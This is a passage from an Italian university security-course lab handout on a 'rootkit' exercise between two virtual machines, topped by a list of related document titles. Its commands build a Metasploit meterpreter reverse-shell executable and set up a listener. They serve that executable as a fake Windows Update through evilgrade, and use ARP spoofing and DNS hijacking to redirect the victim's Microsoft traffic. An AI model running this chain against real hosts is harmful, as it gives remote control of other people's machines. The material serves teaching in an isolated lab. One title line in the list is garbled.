Rootkit. Dott. Ing. Igino Corona. Corso Sicurezza Informatica 2014/2015. igino.corona (at) diee.unica.it. Pattern Recognition and Applications Lab



Documenti analoghi
Networking. Notare che le modifiche apportate attraverso ifconfig riguardano lo stato attuale del sistema e non sono persistenti.

Lezione n.9 LPR- Informatica Applicata

Informazioni Generali (1/2)

Implementazione di VLAN multiple per l utilizzo della rete wireless

Bonding. Matteo Carli Ridondanza e load balancing con schede di rete.

Indirizzi IP questi sconosciuti o quasi!! netmask

Configurazione di una rete locale con Linux

Guida rapida - rete casalinga (con router)

Reti di Calcolatori - Laboratorio. Lezione 8. Gennaro Oliva

Guida rapida - rete casalinga (con router) Configurazione schede di rete con PC

Configurazione di una rete locale con Linux

Caratteristica Reti basate su datagrammi Reti basate su circuito virtuale

INTRODUZIONE ALLE RETI: UN APPROCCIO PRATICO

Gruppo Utenti Linux Cagliari h...

LAN Sniffing con Ettercap

Configurare i tunnel con iproute2

1 GARR Tutorial sulla sicurezza informatica. R. Cecchini e O. Pinazza Roma, /11/2010

Setup dell ambiente virtuale

Formato del Datagram IP. Utilizzo del Type of Service. Formato del Datagram IP (I word) Prof. Vincenzo Auletta. Version HLEN. Type of Service (TOS)

Configurazione Public Network e Load Balancer as a Service. Stefano Nicotri INFN - Sezione di Bari

Sommario. Configurazione dell'interfaccia di rete comando ifconfig individuazione interfacce. impostazioni: comandi ifup e ifdown

Configurazione delle interfacce di rete

IP e Routing. Formato del Datagram IP. Utilizzo del Type of Service. Formato del Datagram IP (I word) Prof. Vincenzo Auletta.

Lavorare in rete. Configurazione di una rete locale con Linux. paolo palmerini.

Corso GNU/Linux - Lezione 5. Davide Giunchi - davidegiunchi@libero.it

Configurazione delle interfacce di rete

Guida all'operatività in rete

Architettura di TCP/IP. IP: Internet Protocol. IP:Internet Protocol. Il livello Network si occupa di: È il livello di Network di TCP/IP

Bucare WindowsXP SP2 con Metasploit

Università degli studi di Udine

Lezione 1 Connessione ad una rete

Ettercap, analisi e sniffing nella rete. Gianfranco Costamagna. LinuxDay abinsula. October 25, 2014

Rete di Computers. insieme di computer collegati tra loro da una struttura di interconnessione

Reti. Reti. IPv4: concetti fondamentali. arp (address resolution protocol) Architettura a livelli (modello OSI)

Ing. Gabriele MONTI Reti in Linux

Seconda Esercitazione

Configurazione dei parametri IP

ARP e instradamento IP

Man In The Middle & SSL Attack

VLAB. Virtual LABoratory un sistema di emulazione di reti di calcolatori

Vediamo come analizzare i pacchetti in transito su una rete con uno dei più celebri sniffer di matrice italiana: Ettercap.

Sistema operativo e rete

Configurazione Rete in LINUX

Configurazione e diagnosi di una rete

Laboratorio 2. C) Login sulla macchina virtuale uid: root pwd: piripicchio

Corsi di Formazione Open Source & Scuola Provincia di Pescara gennaio 2005 aprile ~ anna.1704@ .

Zeroshell: VPN Host-to-Lan. Il sistema operativo multifunzionale. creato da

Reti di Calcolatori

Instradamento IP A.A. 2005/2006. Walter Cerroni. IP: instradamento dei datagrammi. Routing : scelta del percorso su cui inviare i dati

Configurazione del servizio Dynamic DNS. Questa procedura ti guiderà durante i 4 passi necessari alla messa in funzione del servizio.

Corso di Laurea in Ingegneria Informatica. Corso di Reti di Calcolatori a.a. 2009/10

Introduzione ai protocolli di rete Il protocollo NetBEUI Il protocollo AppleTalk Il protocollo DLC Il protocollo NWLink Il protocollo TCP/IP

Corso di recupero di sistemi Lezione 8

Table of Contents 1. Configurazione Client Windows 2000/XP in RoadWarrior... 2

Sicurezza nelle reti

Appunti configurazione firewall con distribuzione Zeroshell (lan + dmz + internet)

Aggiornamenti e Client Side Exploitation

Corso reti 2k7. linuxludus

ImoLUG. [ Corso Linux ]

Per trovare un IP address (indirizzo IP) di un router Linksys, controllare le impostazioni del computer. Per istruzioni, cliccare qui.

Inizializzazione degli Host. BOOTP e DHCP

Networking Tools e Percorso delle Classi

In questo Workshop: Settare il networking di base sulla nostra macchina GNU/LINUX. Imparare a NATTARE la connetività

Firewall e NAT A.A. 2005/2006. Walter Cerroni. Protezione di host: personal firewall

TECNICO SUPERIORE PER L AUTOMAZIONE INDUSTRIALE. Di Tiziano Ragazzi

Per la connessione del router 3Com Office Connect Remote 812 ad un singolo computer è sufficiente rispettare il seguente schema:

Sommario. Configurazione della rete con DHCP. Funzionamento Configurazione lato server Configurazione lato client

Laboratorio di. Reti Informatiche. Corso di Laurea Triennale in Ingegneria Informatica A.A. 2017/2018. Ing. Carlo Vallati

Riassunto della rete virtuale

Raspberry Pi - Labolatorio Informatica

Penetration Testing Aziendale con BeEF

Laboratorio - Configurazione di una NIC con DHCP in Windows 7

/00$)#)+#// )#$ $ )""#,+#)#())# "# #$##( #%# $ )/ #//, #/ $#%# $# )""# +# $ +,+#) 1/-- $234&( + 20%)* /&) 6 / /00$)#"( 7 6$

ARP (Address Resolution Protocol)

Laboratorio - Configurazione di una NIC con DHCP in Windows XP

Le VLAN nella gestione delle reti locali

Il livello 3 della pila ISO/OSI. Il protocollo IP e il protocollo ICMP

2010 Ing. Punzenberger COPA-DATA Srl. Tutti i diritti riservati.

INDIRIZZI IP ARCHITETTURA GENERALE DEGLI INDIRIZZI IP FORME DI INDIRIZZI IP CINQUE FORME DI INDIRIZZI IP

Tre catene (chains) di base, si possono definire altre catene (convenzionalmente in minuscolo)

Linux Networking Tools e Esercizi su TCP

esercizi su sicurezza delle reti maurizio pizzonia sicurezza dei sistemi informatici e delle reti

Attacchi di rete. Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2006/2007

Dal protocollo IP ai livelli superiori

Il web server Apache Lezione n. 3. Introduzione

Transparent Firewall

Protocolli di Comunicazione

CONNESSIONE IPv6 tramite tunnelling Freenet6

NAS 323 Uso del NAS come server VPN

HACKING LAB. con ProxMox e Metasploitable. Andrea Draghetti - 23 Maggio FabLab Bassa Romagna

DEFINIZIONI VM: abbreviazione di Virtual Machine (macchina virtuale).

Corso di Sistemi di Elaborazione delle informazioni. Reti di calcolatori 3 a lezione a.a. 2009/2010 Francesco Fontanella

(1) Network Camera

Indirizzo IP. Come si distinguono? Indirizzo IP : Network address : Host address: : 134

Laboratorio di. Reti Informatiche. Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017. Ing. Niccolò Iardella

Laboratorio - Configurazione di una NIC con DHCP in Windows Vista

Configurazione dell'interfaccia di rete comando ifconfig individuazione interfacce attivazione (up) disattivazione (down)

10.1. Un indirizzo IP viene rappresentato in Java come un'istanza della classe InetAddress.

Gate Manager. 1 Come connettersi a un PLC S7-300/400 con Step7 installato su macchina virtuale. Table of Contents. your partner

Transcript:

Pattern Recognition and Applications Lab Rootkit Dott. Ing. Igino Corona igino.corona (at) diee.unica.it Corso Sicurezza Informatica 2014/2015 Department of Electrical and Electronic Engineering University of Cagliari, Italy

Prerequisiti Virtual machine attaccante - kali linux vittima - windows XP 32bit Entrambe le macchine sulla stessa rete locale su virtualbox - rete con NAT 2

Identificazione della vittima root@kali:~# nmap -ss 10.0.2.0/24 -p56322 Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-20 16:44 CEST Nmap scan report for 10.0.2.1 Host is up (0.00021s latency). PORT STATE SERVICE 56322/tcp closed unknown MAC Address: 52:54:00:12:35:00 (QEMU Virtual NIC) Nmap scan report for 10.0.2.2 Host is up (0.00012s latency). PORT STATE SERVICE 56322/tcp closed unknown MAC Address: 52:54:00:12:35:00 (QEMU Virtual NIC) Nmap scan report for 10.0.2.4 Host is up (0.00023s latency). PORT STATE SERVICE 56322/tcp filtered unknown MAC Address: 08:00:27:C9:73:F6 (Cadmus Computer Systems) Nostro Target (Vittima) Nmap done: 256 IP addresses (5 hosts up) scanned in 2.20 seconds 3

Nostro indirizzo e gateway root@kali:~# ifconfig eth0 Link encap:ethernet HWaddr 08:00:27:ba:17:b4 inet addr:10.0.2.15 Bcast:10.0.2.255 Mask:255.255.255.0 inet6 addr: fe80::a00:27ff:feba:17b4/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:5752 errors:0 dropped:0 overruns:0 frame:0 TX packets:6213 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:4600812 (4.3 MiB) TX bytes:2554976 (2.4 MiB) lo Link encap:local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:84 errors:0 dropped:0 overruns:0 frame:0 TX packets:84 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:11523 (11.2 KiB) TX bytes:11523 (11.2 KiB) Nostro IP (Attaccante) root@kali:~# route Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface default 10.0.2.1 0.0.0.0 UG 0 0 0 eth0 10.0.2.0 * 255.255.255.0 U 0 0 0 eth0 Gateway 4

Realizzazione dell exploit Costruiamo il file eseguibile per realizzare l exploit tramite meterpreter una volta eseguito sul computer vittima, esso si connetterà verso il nostro host all indirizzo IP: 10.0.2.15, alla porta TCP 3333 root@kali:~# msfpayload windows/meterpreter/reverse_tcp lhost=10.0.2.15 lport=3333 X > /root/exploit.exe [!] ************************************************************************ [!] * The utility msfpayload is deprecated! * [!] * It will be removed on or about 2015-06-08 * [!] * Please use msfvenom instead * [!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 * [!] ************************************************************************ Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 281 Options: {"LHOST"=>"10.0.2.15", "LPORT"=>"3333"} root@kali:~# file /root/exploit.exe /root/exploit.exe: PE32 executable (GUI) Intel 80386, for MS Windows Ci mettiamo in ascolto sulla porta TCP 3333 in attesa di connessione da parte della vittima per ottenere una shell remota root@kali:~# msfconsole -q msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 10.0.2.15 lhost => 10.0.2.15 msf exploit(handler) > set lport 3333 lport => 3333 msf exploit(handler) > run [*] Started reverse handler on 10.0.2.15:3333 [*] Starting the payload handler... 5

Social Engineering- windows update Dobbiamo trovare un modo per far eseguire il file /root/exploit.exe sul computer vittima mettiamo su un sito fasullo per windows update! root@kali:~# evilgrade evilgrade>show modules evilgrade>configure winupdate evilgrade(winupdate)>show options Display options: =============== Name = Windows Update Version = 1.0 Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"] Description = "" VirtualHost = "(windowsupdate.microsoft.com update.microsoft.com www.microsoft.com go.microsoft.com)".---------------------------------------------------------------------------------------------------------------------------. Name Default Description +----------+--------------------------------------+-------------------------------------------------------------------------+ enable 1 Status familyid ad724ae0-e72d-4f54-9ab3-75b8eb148356 It's the microsoft familyid from download center default (Removal tool) agent./agent/agent.exe Agent to inject '----------+--------------------------------------+-------------------------------------------------------------------------' evilgrade(winupdate)>set agent /root/exploit.exe set agent, /root/exploit.exe evilgrade(winupdate)>start evilgrade(winupdate)> [21/4/2015:10:30:28] - [DNSSERVER] - DNS Server Ready. Waiting for Connections... Evilgrade mette su un sito web fasullo di windows update che restituirà il file exploit.exe (rinominandolo) lo spaccerà per un aggiornamento importante per windows. 6

ARP Spoofing Ci siamo quasi ora dobbiamo fare in modo che qualsiasi connessione verso nomi di dominio *.microsoft.com da parte della vittima venga dirottate verso il nostro indirizzo IP 10.0.2.15, dove sta in ascolto il servizio windows update fasullo messo su da evilgrade l host vittima e sulla nostra stessa rete locale posso usare arp spoofing e DNS hijacking (vedi lezione su sicurezza utenti web)! Inoltro pacchetti automatico: root@kali:~# sysctl -w net.ipv4.ip_forward=1 net.ipv4.ip_forward = 1 root@kali:~# iptables -I FORWARD 1 -j ACCEPT arp spoofing (aprite una shell separata per ciascun comando) root@kali:~# arpspoof -i eth0 -t 10.0.2.1 10.0.2.4 root@kali:~# arpspoof -i eth0 -t 10.0.2.4 10.0.2.1 DNS hijacking (su un altra shell ancora) root@kali:~# echo *.microsoft.com 10.0.2.15 > ftable root@kali:~# dnsspoof -i eth0 -f ftable 7

Host Vittima - esecuzione update Nel nostro test usiamo un computer con windows XP (32bit) e Internet Explorer 8 8